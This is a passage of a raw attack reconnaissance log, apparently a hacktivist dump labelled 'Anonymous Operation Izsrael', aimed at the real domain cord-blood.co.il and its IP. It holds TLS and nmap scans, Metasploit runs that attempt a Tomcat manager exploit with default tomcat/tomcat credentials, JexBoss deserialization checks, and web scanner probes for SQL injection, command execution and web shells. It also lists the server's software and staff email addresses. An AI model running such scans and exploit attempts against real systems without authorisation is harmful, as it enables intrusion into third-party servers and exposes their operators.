  1938. <p>Additionally, a 400 Bad Request
  1939. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1940. </body></html>
  1941.  
  1942.  
  1943.  
  1944. Version: 1.11.11-static
  1945. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1946.  
  1947. Connected to 80.179.142.111
  1948.  
  1949. Testing SSL server cord-blood.co.il on port 8080 using SNI name cord-blood.co.il
  1950.  
  1951. TLS Fallback SCSV:
  1952. Server does not support TLS Fallback SCSV
  1953.  
  1954. TLS renegotiation:
  1955. Session renegotiation not supported
  1956.  
  1957. TLS Compression:
  1958. Compression disabled
  1959.  
  1960. Heartbleed:
  1961. TLS 1.2 not vulnerable to heartbleed
  1962. TLS 1.1 not vulnerable to heartbleed
  1963. TLS 1.0 not vulnerable to heartbleed
  1964.  
  1965. Supported Server Cipher(s):
  1966.  
  1967. Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-23 00:38 EDT
  1968. Nmap scan report for cord-blood.co.il (80.179.142.111)
  1969. Host is up (0.13s latency).
  1970. rDNS record for 80.179.142.111: yanir.spd.co.il
  1971.  
  1972. PORT STATE SERVICE VERSION
  1973. 8080/tcp filtered http-proxy
  1974. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1975. Device type: firewall|general purpose
  1976. Running: Linux 2.4.X|2.6.X, ISS embedded
  1977. OS CPE: cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:iss:proventia_gx3002 cpe:/o:linux:linux_kernel:2.6.22
  1978. OS details: ISS Proventia GX3002 firewall (Linux 2.4.18), Linux 2.6.22 (Debian 4.0)
  1979.  
  1980. TRACEROUTE (using proto 1/icmp)
  1981. HOP RTT ADDRESS
  1982. 1 ... 30
  1983.  
  1984. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1985. Nmap done: 1 IP address (1 host up) scanned in 12.32 seconds
  1986. #######################################################################################################################################
  1987. RHOST => cord-blood.co.il
  1988. [-] WAR file not found
  1989. [*] Auxiliary module execution completed
  1990. RHOSTS => cord-blood.co.il
  1991. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
  1992. RHOST => cord-blood.co.il
  1993. RPORT => 8080
  1994. [*] Scanned 1 of 1 hosts (100% complete)
  1995. [*] Auxiliary module execution completed
  1996. [*] Attempting to connect to 80.179.142.111:8080
  1997. [+] No File(s) found
  1998. [*] Scanned 1 of 1 hosts (100% complete)
  1999. [*] Auxiliary module execution completed
  2000. [*] http://80.179.142.111:8080/admin/j_security_check - Checking j_security_check...
  2001. [*] http://80.179.142.111:8080/admin/j_security_check - Server returned: 404
  2002. [-] http://80.179.142.111:8080/admin/j_security_check - Unable to enumerate users with this URI
  2003. [*] Scanned 1 of 1 hosts (100% complete)
  2004. [*] Auxiliary module execution completed
  2005. [-] http://80.179.142.111:8080 - Authorization not requested
  2006. [*] Scanned 1 of 1 hosts (100% complete)
  2007. [*] Auxiliary module execution completed
  2008. [-] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/6.6.6" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
  2009. [*] Exploit completed, but no session was created.
  2010. USERNAME => tomcat
  2011. PASSWORD => tomcat
  2012. [-] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/6.6.6" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
  2013. [*] Exploit completed, but no session was created.
  2014. #######################################################################################################################################
  2015.  
  2016. * --- JexBoss: Jboss verify and EXploitation Tool --- *
  2017. | * And others Java Deserialization Vulnerabilities * |
  2018. | |
  2019. | @author: João Filho Matos Figueiredo |
  2020. | @contact: joaomatosf@gmail.com |
  2021. | |
  2022. | @update: https://github.com/joaomatosf/jexboss |
  2023. #______________________________________________________#
  2024.  
  2025. @version: 1.2.4
  2026.  
  2027. * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
  2028.  
  2029.  
  2030. ** Checking Host: http://cord-blood.co.il:8080 **
  2031.  
  2032. [*] Checking admin-console: [ OK ]
  2033. [*] Checking Struts2: [ OK ]
  2034. [*] Checking Servlet Deserialization: [ OK ]
  2035. [*] Checking Application Deserialization: [ OK ]
  2036. [*] Checking Jenkins: [ OK ]
  2037. [*] Checking web-console: [ OK ]
  2038. [*] Checking jmx-console: [ OK ]
  2039. [*] Checking JMXInvokerServlet: [ OK ]
  2040. #######################################################################################################################################
  2041.  
  2042. Scan date: 23-3-2018 0:17:50
  2043. ======================================================================================================================================
  2044. | [*] http://cord-blood.co.il/ redirected to http://abuse.spd.co.il/
  2045. | [*] New target is: http://abuse.spd.co.il/
  2046. ======================================================================================================================================
  2047. | Domain: http://abuse.spd.co.il/
  2048. | Server: Apache/6.6.6
  2049. | IP: 192.116.109.20
  2050. =======================================================================================================================================
  2051. |
  2052. | Directory check:
  2053. | [+] CODE: 200 URL: http://abuse.spd.co.il/squirrelmail/
  2054. ======================================================================================================================================
  2055. |
  2056. | File check:
  2057. | [+] CODE: 200 URL: http://abuse.spd.co.il/error/HTTP_NOT_FOUND.html.var
  2058. | [+] CODE: 200 URL: http://abuse.spd.co.il/index.php
  2059. | [+] CODE: 200 URL: http://abuse.spd.co.il/squirrelmail/src/read_body.php
  2060. =======================================================================================================================================
  2061. |
  2062. | Check robots.txt:
  2063. |
  2064. | Check sitemap.xml:
  2065. =======================================================================================================================================
  2066. |
  2067. | Crawler Started:
  2068. | Plugin name: E-mail Detection v.1.1 Loaded.
  2069. | Plugin name: phpinfo() Disclosure v.1 Loaded.
  2070. | Plugin name: External Host Detect v.1.2 Loaded.
  2071. | Plugin name: FCKeditor upload test v.1 Loaded.
  2072. | Plugin name: Upload Form Detect v.1.1 Loaded.
  2073. | Plugin name: Code Disclosure v.1.1 Loaded.
  2074. | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
  2075. | Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
  2076. | [+] Crawling finished, 7 URL's found!
  2077. |
  2078. | E-mails:
  2079. | [+] E-mail Found: webmaster@abuse.spd.co.il
  2080. | [+] E-mail Found: johndoe@mail.spd.co.il
  2081. |
  2082. | PHPinfo() Disclosure:
  2083. |
  2084. | External hosts:
  2085. | [+] External Host Found: http://www.sPD.co.il
  2086. |
  2087. | FCKeditor File Upload:
  2088. |
  2089. | File Upload Forms:
  2090. |
  2091. | Source Code Disclosure:
  2092. |
  2093. | Timthumb:
  2094. |
  2095. | Web Backdoors:
  2096. |
  2097. | Ignored Files:
  2098. ======================================================================================================================================
  2099. | Dynamic tests:
  2100. | Plugin name: Learning New Directories v.1.2 Loaded.
  2101. | Plugin name: FCKedior tests v.1.1 Loaded.
  2102. | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
  2103. | Plugin name: Find Backup Files v.1.2 Loaded.
  2104. | Plugin name: Blind SQL-injection tests v.1.3 Loaded.
  2105. | Plugin name: Local File Include tests v.1.1 Loaded.
  2106. | Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
  2107. | Plugin name: Remote Command Execution tests v.1.1 Loaded.
  2108. | Plugin name: Remote File Include tests v.1.2 Loaded.
  2109. | Plugin name: SQL-injection tests v.1.2 Loaded.
  2110. | Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
  2111. | Plugin name: Web Shell Finder v.1.3 Loaded.
  2112. | [+] 0 New directories added
  2113. |
  2114. |
  2115. | FCKeditor tests:
  2116. |
  2117. |
  2118. | Timthumb < 1.33 vulnerability:
  2119. |
  2120. |
  2121. | Backup Files:
  2122. |
  2123. |
  2124. | Blind SQL Injection:
  2125. |
  2126. |
  2127. | Local File Include:
  2128. |
  2129. |
  2130. | PHP CGI Argument Injection:
  2131. |
  2132. |
  2133. | Remote Command Execution:
  2134. |
  2135. |
  2136. | Remote File Include:
  2137. |
  2138. |
  2139. | SQL Injection:
  2140. |
  2141. |
  2142. | Cross-Site Scripting (XSS):
  2143. |
  2144. |
  2145. | Web Shell Finder:
  2146. ======================================================================================================================================
  2147. | Static tests:
  2148. | Plugin name: Local File Include tests v.1.1 Loaded.
  2149. | Plugin name: Remote Command Execution tests v.1.1 Loaded.
  2150. | Plugin name: Remote File Include tests v.1.1 Loaded.
  2151. ######################################################################################################################################
  2152. --------------------------------------------------------------------------------------------------------------------------------------
  2153. + Target IP: 80.179.142.111
  2154. + Target Hostname: cord-blood.co.il
  2155. + Target Port: 80
  2156. + Start Time: 2018-03-23 00:41:31 (GMT-4)
  2157. --------------------------------------------------------------------------------------------------------------------------------------
  2158. + Server: nginx
  2159. + The anti-clickjacking X-Frame-Options header is not present.
  2160. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  2161. + Uncommon header 'x-rocket-nginx-bypass' found, with contents: No
  2162. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  2163. + Root page / redirects to: http://abuse.spd.co.il
  2164. + No CGI Directories found (use '-C all' to force check all possible dirs)
  2165. + Retrieved x-powered-by header: PHP/5.6.30
  2166. + Uncommon header 'link' found, with contents: <http://a-d-marhiv.co.il/wp-json/>; rel="https://api.w.org/"
  2167. + Server leaks inodes via ETags, header found with file /sitemap.xml, fields: 0x4b37c181 0x1295
  2168. + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
  2169. + Uncommon header 'x-ob_mode' found, with contents: 1
  2170. + Uncommon header 'x-robots-tag' found, with contents: noindex, nofollow
  2171. + Uncommon header 'x-permitted-cross-domain-policies' found, with contents: none
  2172. + OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized host
  2173. #######################################################################################################################################
  2174. Anonymous Operation Izsrael USA JTSEC full recon 2018 #7